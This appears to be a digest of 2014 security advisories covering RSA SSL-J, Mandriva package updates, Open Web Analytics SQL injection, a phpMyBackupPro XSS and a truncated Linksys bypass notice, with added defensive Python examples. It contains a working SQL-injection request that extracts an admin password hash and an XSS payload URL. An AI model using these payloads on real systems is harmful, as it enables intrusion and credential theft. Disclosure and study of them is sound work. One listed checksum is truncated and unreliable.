ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities

EMC Identifier: ESA-2014-009
CVE Identifier: CVE-2011-1473, CVE-2014-0625, CVE-2014-0626, CVE-2014-0627
Severity Rating: CVSS v2 Base Score: See below for individual scores

Affected Products:
All versions of RSA BSAFE SSL-J (SSL-J) 5.x, SSL-J 6.0

Unaffected Products:
SSL-J 5.1.3, 6.0.2 and 6.1.x

Summary:
SSL-J 6.1.x, 6.0.2 and 5.1.3 contain updates designed to prevent multiple potential security vulnerabilities. Addressed issues include:
1. SSL/TLS Renegotiation Denial of Service Vulnerability (CVE-2011-1473)
2. SSLEngine API Information Disclosure Vulnerability (CVE-2014-0627)
3. SSL-J JSAFE and JSSE API Information Disclosure Vulnerability (CVE-2014-0626)
4. SSLSocket Denial of Service Vulnerability (CVE-2014-0625)

Details:

SSL/TLS Renegotiation Denial of Service Vulnerability (CVE-2011-1473)
An application that does not properly restrict client-initiated renegotiation within the SSL and TLS protocols could be vulnerable to a denial of service (CPU consumption) from remote attackers that perform many renegotiations within a single connection. See http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1473 for more information. SSL-J 6.1.x, 6.0.2 and 5.1.3 include a patch that counts the renegotiations initiated by each SSL/TLS client on each connection, so that the server can set a limit on renegotiation requests.
CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

SSLEngine API Information Disclosure Vulnerability (CVE-2014-0627)
When the SSL-J implementation of the SSLEngine API is used, it is possible for Application Data to be sent using the wrap method after sending the Finished message. However, at this point, when the initial handshake is either an abbreviated handshake in server mode or a full handshake in client mode, the handshake is incomplete because the peer's Finished message has not been received. This can occur for both the TLS client and server. Application Data sent in this manner could be vulnerable to an attacker forcing the use of a weak cipher suite (if weak cipher suites are enabled).
CVSS v2 Base Score: 4.0 (AV:N/AC:H/Au:N/C:P/I:P/A:N)

SSL-J JSAFE and JSSE API Information Disclosure Vulnerability (CVE-2014-0626)
Unencrypted and unauthenticated Application Data can be received by the client or server during the TLS handshake. This Application Data is indistinguishable from data received after the completion of the handshake. This applies to the SSL-J JSAFE and JSSE APIs.
CVSS v2 Base Score: 4.0 (AV:N/AC:H/Au:N/C:P/I:P/A:N)

SSLSocket Denial of Service Vulnerability (CVE-2014-0625)
If SSLSocket (from both the JSAFE and JSSE APIs) is used, Application Data that is received while a handshake is in progress is placed in an internal buffer. This buffer can grow and use up large amounts of memory.
CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

Recommendation:
RSA recommends that customers on SSL-J 5.1.x or lower upgrade to SSL-J 5.1.3, 6.0.2 or 6.1.1. RSA recommends that customers on SSL-J 6.0 upgrade to SSL-J 6.0.2 or 6.1.1. The patch to address CVE-2011-1473 is only applicable on the server side.

Obtaining Downloads:
To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.emc.com/support/rsa/contact/phone-numbers.htm) for most expedient service.

Obtaining Documentation:
To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.
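The four SSL-J issues are all failures of one record-layer state machine: accepting or emitting application data before the peer's Finished, holding mid-handshake data without a cap, and not counting client-initiated renegotiations. The toy gate below is an added example written for this digest, not SSL-J code; record content types and handshake message numbers are the RFC 5246 values, everything else (the class, its limits, the one-byte handshake bodies) is an assumption made for the model.

```python
"""Toy TLS record-layer gate (added example; not SSL-J code) showing the four
controls the SSL-J advisory describes: refuse application data before the first
handshake completes (CVE-2014-0626), refuse to send application data until the
peer's Finished has arrived (CVE-2014-0627), cap data buffered while a
renegotiation is open (CVE-2014-0625), and count and limit client-initiated
renegotiations per connection (CVE-2011-1473). Message layout is simplified:
a handshake record body is a single byte naming the message type."""
from dataclasses import dataclass, field
from typing import List

# TLS record content types (RFC 5246, section 6.2.1)
HANDSHAKE = 22
APPLICATION_DATA = 23
# TLS handshake message types (RFC 5246, section 7.4)
CLIENT_HELLO = 1
FINISHED = 20


class TlsPolicyViolation(Exception):
    """Raised where a real stack would send a fatal alert and close."""


@dataclass
class RecordGate:
    max_buffered: int = 16384        # bytes held while a renegotiation is open
    max_renegotiations: int = 3      # client-initiated renegotiations per connection
    established: bool = False        # set once the first handshake has completed
    handshake_open: bool = True      # a connection starts inside its initial handshake
    renegotiations: int = 0
    pending: bytearray = field(default_factory=bytearray)
    delivered: List[bytes] = field(default_factory=list)
    sent: List[bytes] = field(default_factory=list)

    def receive(self, content_type: int, body: bytes) -> None:
        """Process one inbound record from the peer (server-side view)."""
        if content_type == HANDSHAKE:
            self._handshake(body[0])
        elif content_type == APPLICATION_DATA:
            if not self.established:
                # CVE-2014-0626: nothing before the first Finished is authenticated,
                # so it must never reach the application as if it were.
                raise TlsPolicyViolation("application data before the first handshake completed")
            if self.handshake_open:
                # Renegotiation in progress: data is still protected by the previous
                # keys, but CVE-2014-0625 is why the hold must be bounded.
                if len(self.pending) + len(body) > self.max_buffered:
                    raise TlsPolicyViolation("mid-handshake buffer cap exceeded")
                self.pending.extend(body)
            else:
                self.delivered.append(body)
        else:
            raise TlsPolicyViolation(f"unexpected content type {content_type}")

    def _handshake(self, msg_type: int) -> None:
        if msg_type == CLIENT_HELLO:
            if self.established:
                # CVE-2011-1473: every ClientHello after the first is a
                # client-initiated renegotiation; count it and enforce a limit.
                self.renegotiations += 1
                if self.renegotiations > self.max_renegotiations:
                    raise TlsPolicyViolation("renegotiation limit exceeded")
                self.handshake_open = True
        elif msg_type == FINISHED:
            # Peer's Finished: the open handshake is complete; release held data.
            self.handshake_open = False
            self.established = True
            if self.pending:
                self.delivered.append(bytes(self.pending))
                self.pending.clear()

    def send(self, body: bytes) -> None:
        """Queue outbound application data; refused until the peer's Finished."""
        if self.handshake_open:
            # CVE-2014-0627: having sent our own Finished is not enough.
            raise TlsPolicyViolation("application data before the peer's Finished")
        self.sent.append(body)


def run_scenarios() -> List[str]:
    """Drive the gate through the advisory's situations; returns the outcomes."""
    outcomes: List[str] = []
    gate = RecordGate(max_buffered=8, max_renegotiations=1)

    def attempt(label, fn):
        try:
            fn()
            outcomes.append(f"{label}: allowed")
        except TlsPolicyViolation as exc:
            outcomes.append(f"{label}: refused ({exc})")

    attempt("data before handshake", lambda: gate.receive(APPLICATION_DATA, b"early"))
    gate.receive(HANDSHAKE, bytes([CLIENT_HELLO]))
    attempt("send before peer Finished", lambda: gate.send(b"hello"))
    gate.receive(HANDSHAKE, bytes([FINISHED]))
    attempt("send after handshake", lambda: gate.send(b"hello"))
    gate.receive(HANDSHAKE, bytes([CLIENT_HELLO]))          # first renegotiation
    attempt("small mid-handshake data", lambda: gate.receive(APPLICATION_DATA, b"ok"))
    attempt("oversized mid-handshake data", lambda: gate.receive(APPLICATION_DATA, b"x" * 16))
    gate.receive(HANDSHAKE, bytes([FINISHED]))
    attempt("second renegotiation", lambda: gate.receive(HANDSHAKE, bytes([CLIENT_HELLO])))
    return outcomes


if __name__ == "__main__":
    for line in run_scenarios():
        print(line)
```

The renegotiation counter lives on the connection, not the session, which is what the advisory's server-side patch needs: the limit is per client per connection, and the client-side fix for CVE-2014-0627 is the same `handshake_open` check applied to `send`.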
Severity Rating:
For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating, at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with a particular security vulnerability.

Obtaining More Information:
For more information about RSA products, visit the RSA web site at http://www.rsa.com.

Getting Support and Service:
For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help > Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.

General Customer Support Information: http://www.emc.com/support/rsa/index.htm
RSA SecurCare Online: https://knowledge.rsasecurity.com
EOPS Policy: RSA
[ MDVSA-2014:034 ] yaml
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:034
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : yaml
Date    : February 14, 2014
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

A vulnerability has been discovered and corrected in yaml:

The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0.1.5 performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted tags in a YAML document, which triggers a heap-based buffer overflow (CVE-2013-6393).

The updated packages have been upgraded to the 0.1.5 version which is not vulnerable to this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6393
https://bitbucket.org/xi/libyaml/commits/tag/0.1.5
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
1e4b37eb517ff916bc1a4079fc67644c  mbs1/x86_64/lib64yaml0_2-0.1.5-1.mbs1.x86_64.rpm
3ef60ab7c95691aafd2cbba52d04da9e  mbs1/x86_64/lib64yaml-devel-0.1.5-1.mbs1.x86_64.rpm
1198a9d1904527bb54428bd0aff0  mbs1/SRPMS/yaml-0.1.5-1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFS/hELmqjQ0CJFipgRAn0DAJ9msFRiVQ4jseh/oDdDEtvt3QBXuQCfXMy3
YbR3rskDEyaQwTexrQXgviY=
=Y0UW
-----END PGP SIGNATURE-----
[ MDVSA-2014:031 ] drupal
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:031
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : drupal
Date    : February 14, 2014
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

Multiple security issues were identified and fixed in drupal:

The OpenID module in Drupal 6.x before 6.30 and 7.x before 7.26 allows remote OpenID users to authenticate as other users via unspecified vectors (CVE-2014-1475).

The Taxonomy module in Drupal 7.x before 7.26, when upgraded from an earlier version of Drupal, does not properly restrict access to unpublished content, which allows remote authenticated users to obtain sensitive information via a listing page (CVE-2014-1476).

The updated packages have been upgraded to the 7.26 version which is unaffected by these security flaws.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1475
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1476
https://drupal.org/SA-CORE-2014-001
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
1561765f33c6a67a7b63ecbc783a8e68  mbs1/x86_64/drupal-7.26-1.mbs1.noarch.rpm
5d8bb1fedd2fc2acfe50272dbc57dc50  mbs1/x86_64/drupal-mysql-7.26-1.mbs1.noarch.rpm
6f4d6b410161ef37d36e055b75ac61bf  mbs1/x86_64/drupal-postgresql-7.26-1.mbs1.noarch.rpm
614f9cb70cbb955f445bbb3fc77dc819  mbs1/x86_64/drupal-sqlite-7.26-1.mbs1.noarch.rpm
34636e9e6743b2b8e1e3e4c46156eb6c  mbs1/SRPMS/drupal-7.26-1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFS/g4OmqjQ0CJFipgRAnyuAKCuYKaLOPAPFDMASVzfPls126i77gCgqb64
GSilzcyyvrDTv2pvUEk/ooY=
=IgHR
-----END PGP SIGNATURE-----
[ MDVSA-2014:033 ] socat
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:033
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : socat
Date    : February 14, 2014
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

A vulnerability has been discovered and corrected in socat:

Stack-based buffer overflow in socat 1.3.0.0 through 1.7.2.2 and 2.0.0-b1 through 2.0.0-b6 allows local users to cause a denial of service (segmentation fault) via a long server name in the PROXY-CONNECT address in the command line (CVE-2014-0019).

The updated packages have been upgraded to the 1.7.2.3 version which is not vulnerable to this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0019
http://www.dest-unreach.org/socat/contrib/socat-secadv5.txt
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
556abad28fdb5cc80a15ff69790f4487  mbs1/x86_64/socat-1.7.2.3-1.mbs1.x86_64.rpm
4174e565e7144f2e37712c97163e8292  mbs1/SRPMS/socat-1.7.2.3-1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFS/hAYmqjQ0CJFipgRAhMEAKDMEcdwHBt5zIul+3JpAHc0hxIJFwCfaunk
ncmqVSK6cQLcTIN5dFoju5Q=
=BAB9
-----END PGP SIGNATURE-----
[ MDVSA-2014:032 ] flite
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:032
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : flite
Date    : February 14, 2014
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities have been discovered and corrected in flite:

The play_wave_from_socket function in audio/auserver.c in Flite 1.4 allows local users to modify arbitrary files via a symlink attack on /tmp/awb.wav. NOTE: some of these details are obtained from third party information (CVE-2014-0027).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0027
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
9ff31a7d8198f78a479e6b61df16e65a  mbs1/x86_64/flite-1.3-2.1.mbs1.x86_64.rpm
27f5093dfbae9b8632064a117229a5ff  mbs1/x86_64/lib64flite-devel-1.3-2.1.mbs1.x86_64.rpm
1a7c3036c885f25f810cd61a8fef93b8  mbs1/SRPMS/flite-1.3-2.1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFS/g7tmqjQ0CJFipgRAlH3AJsEAY9WoBk/6vXfc777bnO/wmfz4wCgkceT
ME9lIRmMcBhgbZisJLF9qms=
=UWue
-----END PGP SIGNATURE-----
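Each of the four Mandriva advisories above ends with an "Updated Packages" block of `<md5>  <path>` lines and notes that MandrivaUpdate and urpmi verify those checksums and the GPG signatures automatically. For packages fetched by hand, the script below is the manual equivalent: it is an added example written for this digest, not Mandriva tooling. The two digests embedded in it are copied from the MDVSA-2014:033 (socat) block; the file names, the temporary directory and the dummy contents in `demo()` are constructed for the offline run.

```python
"""Added example (not Mandriva tooling): verify hand-downloaded RPMs against the
"<md5>  <path>" lines of an advisory's "Updated Packages" block before installing."""
import hashlib
import os
import re
import tempfile
from typing import Dict

# One "<md5>  <relative path>" line per package, in the advisory's own format.
CHECKSUM_LINE = re.compile(r"^\s*([0-9a-fA-F]{32})\s+(\S+)\s*$")

# Copied from the MDVSA-2014:033 (socat) advisory above.
ADVISORY_BLOCK = """
556abad28fdb5cc80a15ff69790f4487  mbs1/x86_64/socat-1.7.2.3-1.mbs1.x86_64.rpm
4174e565e7144f2e37712c97163e8292  mbs1/SRPMS/socat-1.7.2.3-1.mbs1.src.rpm
"""


def parse_checksum_block(text: str) -> Dict[str, str]:
    """Map each listed package path to its expected md5 (lower-case hex)."""
    expected = {}
    for line in text.splitlines():
        m = CHECKSUM_LINE.match(line)
        if m:
            expected[m.group(2)] = m.group(1).lower()
    return expected


def md5_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file through md5 so a large RPM is never read into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_packages(expected: Dict[str, str], download_dir: str) -> Dict[str, str]:
    """Return {package path: "ok" | "MISMATCH" | "missing"} for every listed package.
    Only the basename is joined to download_dir, so a path in the list can never
    point outside the download directory."""
    results = {}
    for rel_path, digest in expected.items():
        local = os.path.join(download_dir, os.path.basename(rel_path))
        if not os.path.isfile(local):
            results[rel_path] = "missing"
        elif md5_of_file(local) == digest:
            results[rel_path] = "ok"
        else:
            results[rel_path] = "MISMATCH"
    return results


def demo() -> Dict[str, str]:
    """Constructed run in a temporary directory: one file that matches its listed
    digest, one that does not, and one listed package that was never downloaded."""
    good_payload = b"hello\n"
    expected = parse_checksum_block(ADVISORY_BLOCK)
    expected["constructed/good.rpm"] = hashlib.md5(good_payload).hexdigest()
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "good.rpm"), "wb") as fh:
            fh.write(good_payload)
        with open(os.path.join(tmp, "socat-1.7.2.3-1.mbs1.x86_64.rpm"), "wb") as fh:
            fh.write(b"not the real package\n")   # wrong content on purpose
        return verify_packages(expected, tmp)


if __name__ == "__main__":
    for pkg, state in demo().items():
        print(f"{state:9} {pkg}")
```

A matching md5 only shows that the file is the one the advisory lists; it does not bind the file to Mandriva, and md5 collisions are practical. The binding comes from the package signature the advisory mentions, so `rpm --checksig` against the 0x22458A98 key remains the step that matters.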
CISTI'2014: List of Workshops
*** WORKSHOPS ***

CISTI'2014 - 9th Iberian Conference on Information Systems and Technologies
Barcelona, Spain, June 18 - 21, 2014
http://www.aisti.eu/cisti2014/index.php/en/workshops

List of Workshops to be held in the CISTI'2014 context:

- ARWC 2014 - 1st Workshop on Augmented Reality and Wearable Computing
- ASDACS 2014 - 1st Workshop on Applied Statistics and Data Analysis using Computer Science
- IoT 2014 - 1st Workshop on Internet of Things
- SGaMePlay 2014 - 4th Iberian Workshop on Serious Games and Meaningful Play
- TICAMES 2014 - 2nd Workshop on Information and Communication Technology in Higher Education: Learning Mathematics
- WICTA 2014 - 1st Workshop on ICT for Audit
- WISA 2014 - 6th Workshop on Intelligent Systems and Applications
- WLA 2014 - 1st Workshop on Learning Analytics
- WNIS 2014 - 1st Workshop on Networks, Information and Society

Detailed information about these workshops is available at http://www.aisti.eu/cisti2014/index.php/en/workshops

Best regards,
CISTI'2014 Team
http://www.aisti.eu/cisti2014/index.php/en
[SWRX-2014-001] Open Web Analytics Pre-Auth SQL Injection
Dell SecureWorks Security Advisory SWRX-2014-001
Open Web Analytics Pre-Auth SQL Injection

Advisory Information

Title: Open Web Analytics Pre-Auth SQL Injection
Advisory ID: SWRX-2014-001
Advisory URL: http://www.secureworks.com/cyber-threat-intelligence/advisories/SWRX-2014-001/
Date published: Thursday, January 9, 2014
CVE: CVE-2014-1206
CVSS v2 base score: 7.5
Date of last update: Wednesday, January 8, 2014
Vendors contacted: Open Web Analytics
Release mode: Coordinated
Discovered by: Dana James Traversie, Dell SecureWorks

Summary

Open Web Analytics (OWA) is open source web analytics software that can track and analyze how visitors use websites and applications. OWA is vulnerable to SQL injection that allows an attacker to execute arbitrary SQL statements in the context of the configured OWA database user without authenticating to the web application.

Affected products

This vulnerability affects Open Web Analytics v1.5.4.

Vendor Information, Solutions, and Workarounds

The vendor has released an updated version to address this vulnerability. OWA users should upgrade to version v1.5.5 or later.

Details

An SQL injection vulnerability exists in Open Web Analytics v1.5.4 due to insufficient input validation of the owa_email_address parameter on the password reset page. The password reset page does not require user authentication. A remote attacker can leverage this issue to execute arbitrary SQL statements in the context of the configured OWA database user. The impact of the vulnerability varies based on the deployment and configuration of the OWA, database, and web server software. Successful exploitation could result in complete loss of confidentiality, integrity, and availability in the OWA database and may affect the entire underlying database management system. This issue could also lead to operating system compromise under the right conditions.

CVSS severity (version 2.0)

Access vector: Network
Access complexity: Low
Authentication: None
Impact type: Manipulation of SQL queries and execution of arbitrary SQL commands on the underlying database
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial
CVSS v2 base score: 7.5
CVSS v2 impact subscore: 6.4
CVSS v2 exploitability subscore: 10
CVSS v2 vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Proof of concept

Request:

POST /owa/index.php?owa_do=base.passwordResetForm HTTP/1.1
Host: 10.11.28.70
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.11.28.70/owa/index.php?owa_do=base.passwordResetForm
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 296

owa_email_address=-4534%27+UNION+ALL+SELECT+3627%2C3627%2C3627%2C3627%2C3627%2CCONCAT%280x7177766871%2CIFNULL%28CAST%28password+AS+CHAR%29%2C0x20%29%2C0x7176627971%29%2C3627%2C3627%2C3627%2C3627+FROM+owa.owa_user+LIMIT+0%2C1%23&owa_action=base.passwordResetRequest&owa_submit=Request+New+Password

Response:

HTTP/1.1 200 OK
Date: Fri, 14 Feb 2014 17:03:43 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 3538
Connection: close
Content-Type: text/html; charset=UTF-8

Invalid address: qwvhqe2744931d91565ed5b44a1d52746afa0qvbyq<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title> - Open Web Analytics</title>
<!-- HEAD Elements -->
..

The password hash of the admin user included in the response: e2744931d91565ed5b44a1d52746afa0

Revision history

1.0 2014-01-09: Initial advisory release

PGP keys

This advisory has been signed with the Dell SecureWorks Counter Threat Unit PGP key, which is available for download at http://www.secureworks.com/SecureWorksCTU.asc.

About Dell SecureWorks

Dell Inc. (NASDAQ: DELL) listens to customers and delivers worldwide innovative technology and business solutions they trust and value. Recognized as an industry leader by top analysts, Dell SecureWorks provides world-class information security services to help organizations of all sizes protect their IT assets, comply with regulations and reduce security costs.

Disclaimer

Copyright © 2014 Dell SecureWorks

This advisory may not be edited or modified in any way without the express written consent of Dell SecureWorks. Permission is hereby granted to link to this advisory via the Dell SecureWorks website or use in accordance with the fair use doctrine of U.S. copyright laws. See the Dell SecureWorks terms of use at http://www.secureworks.com/contact/terms_of_use/ for additional information. The most recent version of this advisory may be found on the Dell SecureWorks website at
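The root cause named in the Details section, insufficient validation of `owa_email_address` before it reaches a query, is the classic string-spliced lookup. The script below is an added example written for this digest, not OWA code: it puts the password-reset lookup side by side in its defective and its fixed form against an in-memory SQLite table. The table layout, the rows, the placeholder hashes and the crafted input are all constructed and stand in for the OWA MySQL schema the advisory's PoC targets.

```python
"""Added example (not Open Web Analytics code): the password-reset address lookup
written as string concatenation and as a validated, parameterised query."""
import re
import sqlite3
from typing import Dict, Optional, Tuple

# Strict shape check applied before the value reaches SQL at all.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Constructed marker input: a quote to close the literal, a UNION to append a
# second SELECT, and a comment to discard the rest of the original statement.
CRAFTED_ADDRESS = "x' UNION SELECT 0, password FROM owa_user WHERE user_id = 1 -- "


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the owa_user table with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE owa_user (user_id INTEGER, email_address TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO owa_user VALUES (?, ?, ?)",
        [(1, "admin@example.invalid", "PLACEHOLDER_HASH_ADMIN"),
         (2, "alice@example.invalid", "PLACEHOLDER_HASH_ALICE")],
    )
    return db


def vulnerable_lookup(db: sqlite3.Connection, email: str) -> Optional[Tuple]:
    """The defective pattern: the submitted address becomes part of the SQL text,
    so a value containing a quote rewrites the statement."""
    sql = ("SELECT user_id, email_address FROM owa_user "
           "WHERE email_address = '" + email + "'")
    return db.execute(sql).fetchone()


def safe_lookup(db: sqlite3.Connection, email: str) -> Optional[Tuple]:
    """Validate the shape first, then bind the value: it is only ever compared as data."""
    if not EMAIL_RE.match(email):
        return None
    return db.execute(
        "SELECT user_id, email_address FROM owa_user WHERE email_address = ?",
        (email,),
    ).fetchone()


def demo() -> Dict[str, Optional[Tuple]]:
    """Run both lookups on a normal address and on the crafted one."""
    db = build_db()
    return {
        "vulnerable_normal": vulnerable_lookup(db, "alice@example.invalid"),
        "vulnerable_crafted": vulnerable_lookup(db, CRAFTED_ADDRESS),
        "safe_normal": safe_lookup(db, "alice@example.invalid"),
        "safe_crafted": safe_lookup(db, CRAFTED_ADDRESS),
    }


if __name__ == "__main__":
    for case, row in demo().items():
        print(f"{case:19} -> {row}")
```

The crafted value makes `vulnerable_lookup` return a row whose second column is a password hash rather than an address, which is exactly the leak channel in the PoC above (the "Invalid address:" message echoes whatever the query produced). With the value rejected before any query runs, `safe_lookup` has nothing to echo; the parameter binding is the control, and the regex is defence in depth that also keeps junk out of the error path.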
phpMyBackupPro-2.4 Cross-Site Scripting vulnerability
###############################################################
# phpMyBackupPro Cross-Site Scripting vulnerability
###############################################################
#
# Exploit Title : phpMyBackupPro-2.4 Cross-Site Scripting vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : iedb.t...@gmail.com - o0_shabgard...@yahoo.com
# Home : Www.IeDb.Ir/acc - Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Software Link : http://www.phpmybackuppro.net/download.php
# Version : 2.4
# Security Risk : Low
# Tested on : Windows
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F@riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
#           E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
#           DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
#           Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#
# Source (get_file.php):

if (isset($_GET['view']) && file_exists($_GET['view'])) {
    if (isset($_GET['download'])) {
        header("Content-Type: application/octet-stream");
        header("Content-Disposition: attachment; filename=\"".basename($_GET['view'])."\"");
        readfile($_GET['view']);
    } else {
        echo "<pre>";
        while ($line = PMBP_getln($_GET['view'])) echo htmlentities($line);
        PMBP_getln($_GET['view'], true);
        echo "</pre>";
    }
} else {
    // The file does not exist: $_GET['view'] is echoed back into the page
    // without encoding, which is the reflected cross-site scripting
    if (isset($_GET['view'])) echo $_GET['view']." ".F_MAIL_3."!";
}

Bug  : http://127.0.0.1/phpMyBackupPro/get_file.php?view=<script>alert(/IeDb.Ir/)</script>
Dem0 : http://iedb.ir/up/imagef-13924803543531-jpg.html
#
# Tnx To : All Member In Iedb.ir/acc Iranian Hackers
#
# Exploit Archive = http://www.iedb.ir/exploits-1350.html
#
Full Disclosure - Linksys EA2700, EA3500, E4200 and EA4500 - Authentication Bypass to Administrative Console
Vulnerable products: Linksys EA2700, EA3500, E4200, EA4500

Vulnerability:
Due to an unknown bug, which by every indication occurs during the installation and/or upgrade process, port 8083 will often open, allowing remote unauthenticated users to bypass authentication directly into the classic Linksys GUI administrative console. If vulnerable, an attacker would have complete control of the router's administrative features and functions.

